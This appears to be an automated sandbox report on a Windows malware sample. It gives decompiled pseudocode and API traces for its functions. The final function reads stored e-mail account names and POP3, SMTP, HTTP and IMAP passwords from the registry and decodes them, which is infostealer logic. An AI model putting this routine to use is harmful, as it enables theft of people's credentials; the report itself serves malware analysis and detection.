                                  • Instruction Fuzzy Hash: 62413E74A00245AFCB14DFA5C888DEFBBB9EFC4714B14459EE441EB250DB78DA41CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			_entry_() {
                                  				struct _STARTUPINFOA _v72;
                                  				intOrPtr _t6;
                                  				int _t11;
                                  				intOrPtr _t15;
                                  				intOrPtr* _t16;
                                  				intOrPtr* _t18;
                                  				intOrPtr _t20;
                                  
                                  				_t16 = GetCommandLineA();
                                  				_t6 =  *_t16;
                                  				if(_t6 != 0x22) {
                                  					while(1) {
                                  						__eflags = _t6 - 0x20;
                                  						if(_t6 <= 0x20) {
                                  							break;
                                  						}
                                  						_t16 = _t16 + 1;
                                  						__eflags = _t16;
                                  						_t6 =  *_t16;
                                  					}
                                  					L12:
                                  					if(_t6 != 0) {
                                  						__eflags = _t6 - 0x20;
                                  						if(_t6 > 0x20) {
                                  							goto L13;
                                  						}
                                  						_t16 = _t16 + 1;
                                  						__eflags = _t16;
                                  						L11:
                                  						_t6 =  *_t16;
                                  						goto L12;
                                  					}
                                  					L13:
                                  					_t2 =  &(_v72.dwFlags);
                                  					_v72.dwFlags = _v72.dwFlags & 0x00000000;
                                  					GetStartupInfoA( &_v72);
                                  					E00405EB6();
                                  					E00405EE3(0x41c000, 0x41c030);
                                  					GetModuleHandleA(0);
                                  					_t11 = E004154EB( *_t2, 0x41c000, 0x41c000); // executed
                                  					E00405ECB();
                                  					ExitProcess(_t11);
                                  				}
                                  				_t18 = _t16 + 1;
                                  				_t20 =  *_t18;
                                  				if(_t20 == 0) {
                                  					L5:
                                  					_t1 = _t18 + 1; // 0x3
                                  					_t14 =  !=  ? _t18 : _t1;
                                  					_t16 =  !=  ? _t18 : _t1;
                                  					goto L11;
                                  				}
                                  				_t15 = _t20;
                                  				while(1) {
                                  					_t20 = _t15;
                                  					if(_t15 == 0x22) {
                                  						goto L5;
                                  					}
                                  					_t18 = _t18 + 1;
                                  					_t20 =  *_t18;
                                  					_t15 = _t20;
                                  					if(_t20 != 0) {
                                  						continue;
                                  					}
                                  					goto L5;
                                  				}
                                  				goto L5;
                                  			}


                                  APIs
                                  • GetCommandLineA.KERNEL32 ref: 00405E2F
                                  • GetStartupInfoA.KERNEL32 ref: 00405E7E
                                  • GetModuleHandleA.KERNEL32(00000000), ref: 00405E9A
                                  • ExitProcess.KERNEL32 ref: 00405EAF
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                  • String ID:
                                  • API String ID: 2164999147-0
                                  • Opcode ID: 03e413eae8a4ea63490194bdb283974b75a2e54e2929799594d1208bb41f8623
                                  • Instruction ID: 79012c7e925f986a536a85d8df8cd7193993c2d42f70a77d9956ba037c84b5bc
                                  • Opcode Fuzzy Hash: 03e413eae8a4ea63490194bdb283974b75a2e54e2929799594d1208bb41f8623
                                  • Instruction Fuzzy Hash: DE010434108A444ED7206B74D8863EB3FA6DB1A348B68107EE1C5A7382C63E0E478EDD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 91%
                                  			E004134A2(CHAR* __ecx, signed int* __edx) {
                                  				long _v8;
                                  				void* _t5;
                                  				long _t6;
                                  				signed int _t7;
                                  				void* _t11;
                                  				signed int* _t18;
                                  				void* _t22;
                                  
                                  				_push(__ecx);
                                  				_t18 = __edx;
                                  				_t11 = E00401085(0x400000);
                                  				_v8 = 0;
                                  				_t5 = CreateFileA(__ecx, 0x80000000, 0, 0, 3, 0x80, 0); // executed
                                  				_t22 = _t5;
                                  				if(_t22 == 0xffffffff) {
                                  					 *_t18 =  *_t18 & 0x00000000;
                                  				}
                                  				_t6 = GetFileSize(_t22, 0);
                                  				 *_t18 = _t6;
                                  				_t7 = ReadFile(_t22, _t11, _t6,  &_v8, 0); // executed
                                  				if(_t7 == 0) {
                                  					 *_t18 =  *_t18 & _t7;
                                  				}
                                  				CloseHandle(_t22); // executed
                                  				return _t11;
                                  			}


                                  APIs
                                    • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                    • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                  • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 004134CF
                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00415553), ref: 004134E2
                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004134F3
                                  • CloseHandle.KERNEL32(00000000), ref: 00413500
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                  • String ID:
                                  • API String ID: 2517252058-0
                                  • Opcode ID: acc67c7317e70eea7451c17902bc0e4f69181cd995ee4df2eb362c61f509b136
                                  • Instruction ID: aa115e6f790b4d38b1fbeae35b29bc5e12f96e584a277f2799dc653a56db372b
                                  • Opcode Fuzzy Hash: acc67c7317e70eea7451c17902bc0e4f69181cd995ee4df2eb362c61f509b136
                                  • Instruction Fuzzy Hash: E1F0AFB2605210BFE3215B35AC09FFB76ACDB54725F204135FA41E62C0EBB45E0086A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00403447(WCHAR** __ecx, void* __eflags, WCHAR** _a4) {
                                  				void* _t4;
                                  				WCHAR* _t6;
                                  				WCHAR** _t8;
                                  				WCHAR** _t14;
                                  
                                  				_t14 = _a4;
                                  				_t8 = __ecx;
                                  				_t4 = E00403373(_t14);
                                  				_t6 = E00405F8C( *((intOrPtr*)(__ecx)), 4 + (_t4 + E00403373(__ecx)) * 2); // executed
                                  				 *_t8 = _t6;
                                  				return lstrcatW(_t6,  *_t14);
                                  			}


                                  APIs
                                    • Part of subcall function 00403373: lstrlenW.KERNEL32(74A313FB,00403758,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,74A313FB,00000000), ref: 0040337A
                                  • lstrcatW.KERNEL32 ref: 00403477
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcatlstrlen
                                  • String ID: ?VA
                                  • API String ID: 1475610065-1028452459
                                  • Opcode ID: 2f3517887fd5a0b623de7eb871a814aad56a43f5e694413d6d57f4bdb99eb0b7
                                  • Instruction ID: 49b9b30c5e13f085cb611e028f6c6d6892849633b3b038c637a710d95911752b
                                  • Opcode Fuzzy Hash: 2f3517887fd5a0b623de7eb871a814aad56a43f5e694413d6d57f4bdb99eb0b7
                                  • Instruction Fuzzy Hash: 02E0D8327042105BCB106B66D8C496E7B5DEF853A0704043AF90597250DE785C0096E8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0041338D(signed int _a4) {
                                  
                                  				Sleep(1); // executed
                                  				return GetTickCount() * (1 + _a4 * 0x359) % 0x2710;
                                  			}


                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CountSleepTick
                                  • String ID:
                                  • API String ID: 2804873075-0
                                  • Opcode ID: 62ba6aea4ccaa183db535f1184d9731aabb142e05b2b2deef58fc80dffe5c418
                                  • Instruction ID: cb4e42e87864ed722aedde75ee5ec1912828b431a3830261680a48f961af466f
                                  • Opcode Fuzzy Hash: 62ba6aea4ccaa183db535f1184d9731aabb142e05b2b2deef58fc80dffe5c418
                                  • Instruction Fuzzy Hash: EDD0123035C104AFE30C9B59FC5E7A57A6ED7D5705F04C03BF60EC92E1C9B195554598
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004117A2(void** __ecx) {
                                  				int _t2;
                                  				void** _t4;
                                  
                                  				_t4 = __ecx;
                                  				ReleaseMutex( *__ecx);
                                  				_t2 = CloseHandle( *_t4); // executed
                                  				return _t2;
                                  			}


                                  APIs
                                  • ReleaseMutex.KERNEL32(?,?,0041141C,.VA,00405D32,.VA,00000000,00000000,00000000,00000000,?,?,?,?,00000000,.bss), ref: 004117A7
                                  • CloseHandle.KERNEL32(?), ref: 004117AF
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleMutexRelease
                                  • String ID:
                                  • API String ID: 4207627910-0
                                  • Opcode ID: 9070c27b8a4b9f148fcf1c292b5093e63aa80bcd4563dcd4d2d625aad2e24fc1
                                  • Instruction ID: da85866315e866d9b3d8c4bbf16f7db246e1d0e2a6d46926b2ed1ada722145db
                                  • Opcode Fuzzy Hash: 9070c27b8a4b9f148fcf1c292b5093e63aa80bcd4563dcd4d2d625aad2e24fc1
                                  • Instruction Fuzzy Hash: FFB0923A009020EFEB222F14FC0C8C4BBB5EF0925131185BAF08182138CBB20C519B94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00401085(long _a4) {
                                  				void* _t3;
                                  
                                  				_t3 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
                                  				return _t3;
                                  			}


                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                  • RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcess
                                  • String ID:
                                  • API String ID: 1357844191-0
                                  • Opcode ID: 361bd0a745674208a41a1b438dab8da89b21d4b91da0fe10cf2071da8b51176b
                                  • Instruction ID: edbd1dd06743cb7a1a2c428d36d16fad14126cf83079969d3a169869f5bf1203
                                  • Opcode Fuzzy Hash: 361bd0a745674208a41a1b438dab8da89b21d4b91da0fe10cf2071da8b51176b
                                  • Instruction Fuzzy Hash: 06B00275558200ABDE516BA09F0DB597A75AB48702F048594B24585060C77544519B66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 87%
                                  			E00414C38(void* __ecx) {
                                  				void* _t22;
                                  				intOrPtr* _t32;
                                  				intOrPtr* _t33;
                                  				intOrPtr* _t34;
                                  				intOrPtr* _t37;
                                  				void* _t42;
                                  
                                  				_t42 = __ecx;
                                  				_t32 =  *((intOrPtr*)(__ecx + 0x34));
                                  				if(_t32 != 0) {
                                  					 *((intOrPtr*)( *_t32 + 0x24))(_t32);
                                  				}
                                  				_t33 =  *((intOrPtr*)(_t42 + 0x34));
                                  				if(_t33 != 0) {
                                  					 *((intOrPtr*)( *_t33 + 8))(_t33);
                                  					 *((intOrPtr*)(_t42 + 0x34)) = 0;
                                  				}
                                  				_t34 =  *((intOrPtr*)(_t42 + 0x18));
                                  				if(_t34 != 0) {
                                  					 *((intOrPtr*)( *_t34 + 8))(_t34);
                                  					 *((intOrPtr*)(_t42 + 0x18)) = 0;
                                  				}
                                  				E00402562(_t42 + 0x1c);
                                  				E00402562(_t42 + 0x20);
                                  				_t37 =  *((intOrPtr*)(_t42 + 0x24));
                                  				if(_t37 != 0) {
                                  					 *((intOrPtr*)( *_t37 + 8))(_t37);
                                  					 *((intOrPtr*)(_t42 + 0x24)) = 0;
                                  				}
                                  				E00402562(_t42 + 0x28);
                                  				E00402562(_t42 + 0x2c);
                                  				_t22 = E00402562(_t42 + 0x30);
                                  				 *((intOrPtr*)(_t42 + 0x34)) = 0;
                                  				__imp__CoUninitialize(); // executed
                                  				return _t22;
                                  			}


                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Uninitialize
                                  • String ID:
                                  • API String ID: 3861434553-0
                                  • Opcode ID: f409e6eadb3aaa3bb9f8bd5a13b75d6ab8235dd759573a421781aaf34dc19ad9
                                  • Instruction ID: 5160318e26e57bbb59a4e031077ca80efc8ba31f4ff7defc0b7589d9c5b86bff
                                  • Opcode Fuzzy Hash: f409e6eadb3aaa3bb9f8bd5a13b75d6ab8235dd759573a421781aaf34dc19ad9
                                  • Instruction Fuzzy Hash: DC012E752027008BC328DF36C698866B7F4BF94700301092EA48787AA1DB35F941CA48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004032E6(WCHAR** __ecx, WCHAR** __edx, void* __eflags) {
                                  				short _v1028;
                                  				WCHAR** _t14;
                                  				WCHAR** _t15;
                                  
                                  				_t15 = __edx;
                                  				_t14 = __ecx;
                                  				E00401052( &_v1028, 0, 0x400);
                                  				ExpandEnvironmentStringsW( *_t15,  &_v1028, 0x1ff);
                                  				E004036F7(_t14,  &_v1028); // executed
                                  				return _t14;
                                  			}


                                  APIs
                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 00403319
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$EnvironmentExpandStringslstrcpy
                                  • String ID:
                                  • API String ID: 1709970682-0
                                  • Opcode ID: 7b1ab6c01e49d58df192e51cc805c7a5d7486070a1782082588882e62a7bfd3e
                                  • Instruction ID: c9e9bc113a16d457794ea73b6dea9160bc4569d11f418ada23e118eebf44067f
                                  • Opcode Fuzzy Hash: 7b1ab6c01e49d58df192e51cc805c7a5d7486070a1782082588882e62a7bfd3e
                                  • Instruction Fuzzy Hash: E9E048B670015967DB30A6169C06FD6776DDBC471CF0400B9B709F21D0E975DA06C6A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E00405A23(void* __ecx, void* __eflags) {
                                  
                                  				E004032D5(__ecx);
                                  				 *((intOrPtr*)(__ecx + 0x10)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x14)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x30)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x34)) = 0;
                                  				E004117B7(__ecx + 0x1d8, __ecx);
                                  				__imp__#115(2, __ecx + 0x38); // executed
                                  				 *(__ecx + 0xc) =  *(__ecx + 0xc) | 0xffffffff;
                                  				 *((intOrPtr*)(__ecx + 0x18)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x24)) = 0;
                                  				return __ecx;
                                  			}


                                  APIs
                                    • Part of subcall function 004117B7: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,004113FD,?,?,00411978,?,74A313FB,00000000,00405B72), ref: 004117BF
                                  • WSAStartup.WS2_32(00000002,?), ref: 00405A4C
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateMutexStartup
                                  • String ID:
                                  • API String ID: 3730780901-0
                                  • Opcode ID: 8fc4056cf67e8e1589ff72f7a35a52cbe4d60c4a23f4d9fffcf1e601f2432e09
                                  • Instruction ID: 2a260520f2afbb8a1e0ca9aeaaef8dbe40d0ee1d54cebc48408a6e1b33bc0553
                                  • Opcode Fuzzy Hash: 8fc4056cf67e8e1589ff72f7a35a52cbe4d60c4a23f4d9fffcf1e601f2432e09
                                  • Instruction Fuzzy Hash: 8DE03971500B008BC270AF2B9945893FBF8FF907207000A1FE5A682AA0C7B0B1048B54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004112C4(intOrPtr* __ecx, CHAR** _a4) {
                                  				intOrPtr* _t10;
                                  
                                  				_t10 = __ecx;
                                  				E00403237(__ecx + 4, _a4); // executed
                                  				 *_t10 = CreateEventA(0, 1, 0,  *(_t10 + 4));
                                  				return 1;
                                  			}


                                  APIs
                                    • Part of subcall function 00403237: lstrcatA.KERNEL32(00000000,74A313FB,?,00000000,?,004036D6,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 00403263
                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,?,?), ref: 004112DF
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateEventlstrcat
                                  • String ID:
                                  • API String ID: 2275612694-0
                                  • Opcode ID: 6d37ef84c37783529fc4d2debaab04c5f689fd435ec9aa43ab3e61700c21c811
                                  • Instruction ID: 39468192288ec31cf53fa38ac828197baabee26d9983865f2de3b863843106a1
                                  • Opcode Fuzzy Hash: 6d37ef84c37783529fc4d2debaab04c5f689fd435ec9aa43ab3e61700c21c811
                                  • Instruction Fuzzy Hash: 7CD02E322082017BD700AF91DC02F92BF29EB50760F008036F24882180CBB1A020C790
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004117B7(void** __ecx) {
                                  				void* _t5;
                                  				void** _t10;
                                  
                                  				_t10 = __ecx;
                                  				_t5 = CreateMutexA(0, 0, 0); // executed
                                  				 *_t10 = _t5;
                                  				_t10[1] = 0 | _t5 != 0xffffffff;
                                  				return _t10;
                                  			}

                                  APIs
                                  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,004113FD,?,?,00411978,?,74A313FB,00000000,00405B72), ref: 004117BF
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateMutex
                                  • String ID:
                                  • API String ID: 1964310414-0
                                  • Opcode ID: 9b62faa460be2adddf2a4740bf86999dfbec1966c7ca0747a50593f43ad6b7fc
                                  • Instruction ID: d1f17f3edcdec86f78565eb2beadc44be2d21716b89def248c0870d2ffc3ae74
                                  • Opcode Fuzzy Hash: 9b62faa460be2adddf2a4740bf86999dfbec1966c7ca0747a50593f43ad6b7fc
                                  • Instruction Fuzzy Hash: 72D012F15045206FA3249F395C088A775DDDF98730315CF39B4A5C72D4E5308C808760
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SHCreateDirectoryExW.SHELL32(00000000,?,00000000), ref: 00410C44
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateDirectory
                                  • String ID:
                                  • API String ID: 4241100979-0
                                  • Opcode ID: 9a991b3da34938619209aa850904dd2585657d0af3bfd830ffa1374368b66a4b
                                  • Instruction ID: bf7d7d0385146835833033b658300741a11cd90afef40312a0121630c5b8194d
                                  • Opcode Fuzzy Hash: 9a991b3da34938619209aa850904dd2585657d0af3bfd830ffa1374368b66a4b
                                  • Instruction Fuzzy Hash: 7AB012303E82005BDE101B708C06F103520A712B07F2001B0B112C90E0C66100065504
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00405F68(long __ecx) {
                                  				void* _t1;
                                  				long _t7;
                                  				void* _t8;
                                  
                                  				_t7 = __ecx;
                                  				_t1 = VirtualAlloc(0, __ecx, 0x3000, 4); // executed
                                  				_t8 = _t1;
                                  				E00406077(_t8, _t7);
                                  				return _t8;
                                  			}

                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,004034F4,?,00405B8D,.bss,00000000), ref: 00405F76
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: f1a7ba58f94a8befa6630eb27b5e9bf87aed46268b93f7419a6681cf929e3ed4
                                  • Instruction ID: e48ffaa35cf7c95941dea0d5a44f438d870c849a0c4b6b129c3fdc7458d1fa28
                                  • Opcode Fuzzy Hash: f1a7ba58f94a8befa6630eb27b5e9bf87aed46268b93f7419a6681cf929e3ed4
                                  • Instruction Fuzzy Hash: 58C012223482602AE124111A7C1AF5B9DACCBC1FB1F01002FF6059A2D0D9D00C0181A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00409733(void* __eax, void* __ecx) {
                                  				int _t3;
                                  				void* _t5;
                                  
                                  				_t5 =  *(__ecx + 0x10);
                                  				if(_t5 != 0) {
                                  					_t3 = VirtualFree(_t5, 0, 0x8000); // executed
                                  					return _t3;
                                  				} else {
                                  					return __eax;
                                  				}
                                  			}

                                  APIs
                                  • VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FreeVirtual
                                  • String ID:
                                  • API String ID: 1263568516-0
                                  • Opcode ID: 9bc93bb1a3698aea7ee270b90f1be36fa01f6a0388a93eaf891ae68bb0364329
                                  • Instruction ID: d77e01f5aa36a87b39216e07334d8eada759ddd446e76f586daee25b3cfe99bb
                                  • Opcode Fuzzy Hash: 9bc93bb1a3698aea7ee270b90f1be36fa01f6a0388a93eaf891ae68bb0364329
                                  • Instruction Fuzzy Hash: F8B0923438070157EE2CDB208C55F6A2220BB80B05FA089ACB102AA1D08AB9E4028A08
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00405FFA(long __ecx) {
                                  				void* _t1;
                                  
                                  				_t1 = VirtualAlloc(0, __ecx, 0x3000, 4); // executed
                                  				return _t1;
                                  			}

                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00403764,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,74A313FB,00000000), ref: 00406004
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 03a753f4e56950697ff4e71072d1805ec65d3fd45af3395555f01cc7733772b7
                                  • Instruction ID: d603def4ad70c1049ddec86c054817805532c4fd5811fc6e80ce733ca9b25ee4
                                  • Opcode Fuzzy Hash: 03a753f4e56950697ff4e71072d1805ec65d3fd45af3395555f01cc7733772b7
                                  • Instruction Fuzzy Hash: 40A002B07D93047EFD6997509D1FF553D68A744F16F604154B3096D0D0A5E02500C52D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00405FEB(void* __ecx) {
                                  				int _t1;
                                  
                                  				_t1 = VirtualFree(__ecx, 0, 0x8000); // executed
                                  				return _t1;
                                  			}

                                  APIs
                                  • VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FreeVirtual
                                  • String ID:
                                  • API String ID: 1263568516-0
                                  • Opcode ID: 7c6eb06f239127f0dcae98b16747e067cbb9817e51cb8f59be5681c4efa5b6de
                                  • Instruction ID: a4afafc7f9fbe744b945ffb19ace319cc8b7579b2679098b8a9567e0cb6a054f
                                  • Opcode Fuzzy Hash: 7c6eb06f239127f0dcae98b16747e067cbb9817e51cb8f59be5681c4efa5b6de
                                  • Instruction Fuzzy Hash: E6A002706D470066ED7457605D4AF4526247740B51F208A947241A80E08AF5A0458A5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  C-Code - Quality: 98%
                                  			E004099FF(void* __ecx, void* __edx, void* __eflags, void* _a4) {
                                  				int _v8;
                                  				intOrPtr _v12;
                                  				char _v16;
                                  				char _v20;
                                  				char _v24;
                                  				char _v292;
                                  				char _v556;
                                  				char _v820;
                                  				char _v9012;
                                  				char _v17204;
                                  				long _t124;
                                  				long _t130;
                                  				long _t136;
                                  				long _t142;
                                  				void* _t180;
                                  				void* _t181;
                                  				void* _t199;
                                  				void* _t207;
                                  				void* _t208;
                                  				void* _t209;
                                  				void* _t210;
                                  				void* _t211;
                                  				void* _t212;
                                  				void* _t213;
                                  				void* _t214;
                                  				void* _t215;
                                  				void* _t216;
                                  				void* _t217;
                                  
                                  				_t199 = __edx;
                                  				_t181 = __ecx;
                                  				E004011C0(0x4334, __ecx);
                                  				_v8 = 0x1000;
                                  				_v24 = 0;
                                  				_v20 = 0;
                                  				_t180 = _t181;
                                  				_v16 = 0;
                                  				E00401052( &_v292, 0, 0x104);
                                  				E00401052( &_v556, 0, 0x104);
                                  				E00401052( &_v820, 0, 0x104);
                                  				E00401052( &_v9012, 0, _v8);
                                  				_t207 = _a4;
                                  				_t209 = _t208 + 0x30;
                                  				if(RegQueryValueExW(_t207, L"Account Name", 0, 0,  &_v9012,  &_v8) == 0) {
                                  					E00403411( &_v20, _t199,  &_v9012);
                                  				}
                                  				_v8 = 0x1000;
                                  				E00401052( &_v9012, 0, 0x1000);
                                  				_t210 = _t209 + 0xc;
                                  				if(RegQueryValueExW(_t207, L"Email", 0, 0,  &_v9012,  &_v8) == 0) {
                                  					E00403411( &_v20, _t199,  &_v9012);
                                  				}
                                  				_v8 = 0x1000;
                                  				E00401052( &_v9012, 0, 0x1000);
                                  				_t211 = _t210 + 0xc;
                                  				if(RegQueryValueExW(_t207, L"POP3 Server", 0, 0,  &_v9012,  &_v8) == 0) {
                                  					E00403411( &_v24, _t199,  &_v9012);
                                  				}
                                  				_v8 = 0x1000;
                                  				E00401052( &_v9012, 0, 0x1000);
                                  				_t212 = _t211 + 0xc;
                                  				if(RegQueryValueExW(_t207, L"POP3 User", 0, 0,  &_v9012,  &_v8) == 0) {
                                  					E00403411( &_v20, _t199,  &_v9012);
                                  				}
                                  				_v8 = 0x1000;
                                  				E00401052( &_v9012, 0, 0x1000);
                                  				_t213 = _t212 + 0xc;
                                  				if(RegQueryValueExW(_t207, L"SMTP Server", 0, 0,  &_v9012,  &_v8) == 0) {
                                  					E00403411( &_v24, _t199,  &_v9012);
                                  				}
                                  				_v8 = 0x1000;
                                  				E00401052( &_v9012, 0, 0x1000);
                                  				_t214 = _t213 + 0xc;
                                  				_t124 = RegQueryValueExW(_t207, L"POP3 Password", 0, 0,  &_v9012,  &_v8);
                                  				_t225 = _t124;
                                  				if(_t124 == 0) {
                                  					E00401052( &_v17204, _t124, 0x1000);
                                  					E00409D97( &_v9012,  &_v17204, _t225, _v8);
                                  					_t214 = _t214 + 0x10;
                                  					E00403411( &_v16,  &_v17204,  &_v17204);
                                  				}
                                  				_v8 = 0x1000;
                                  				E00401052( &_v9012, 0, 0x1000);
                                  				_t215 = _t214 + 0xc;
                                  				_t130 = RegQueryValueExW(_t207, L"SMTP Password", 0, 0,  &_v9012,  &_v8);
                                  				_t226 = _t130;
                                  				if(_t130 == 0) {
                                  					E00401052( &_v17204, _t130, 0x1000);
                                  					E00409D97( &_v9012,  &_v17204, _t226, _v8);
                                  					_t215 = _t215 + 0x10;
                                  					E00403411( &_v16,  &_v17204,  &_v17204);
                                  				}
                                  				_v8 = 0x1000;
                                  				E00401052( &_v9012, 0, 0x1000);
                                  				_t216 = _t215 + 0xc;
                                  				_t136 = RegQueryValueExW(_t207, L"HTTP Password", 0, 0,  &_v9012,  &_v8);
                                  				_t227 = _t136;
                                  				if(_t136 == 0) {
                                  					E00401052( &_v17204, _t136, 0x1000);
                                  					E00409D97( &_v9012,  &_v17204, _t227, _v8);
                                  					_t216 = _t216 + 0x10;
                                  					E00403411( &_v16,  &_v17204,  &_v17204);
                                  				}
                                  				_v8 = 0x1000;
                                  				E00401052( &_v9012, 0, 0x1000);
                                  				_t217 = _t216 + 0xc;
                                  				_t142 = RegQueryValueExW(_t207, L"IMAP Password", 0, 0,  &_v9012,  &_v8);
                                  				_t228 = _t142;
                                  				if(_t142 == 0) {
                                  					E00401052( &_v17204, _t142, 0x1000);
                                  					E00409D97( &_v9012,  &_v17204, _t228, _v8);
                                  					_t217 = _t217 + 0x10;
                                  					E00403411( &_v16,  &_v17204,  &_v17204);
                                  				}
                                  				_v12 = 3;
                                  				if(E00403373( &_v24) > 0) {
                                  					E00401FF2(_t217 - 0x10,  &_v24);
                                  					E00402028(_t180);
                                  				}
                                  				E00401441( &_v24);
                                  				return 1;
                                  			}

                                  APIs
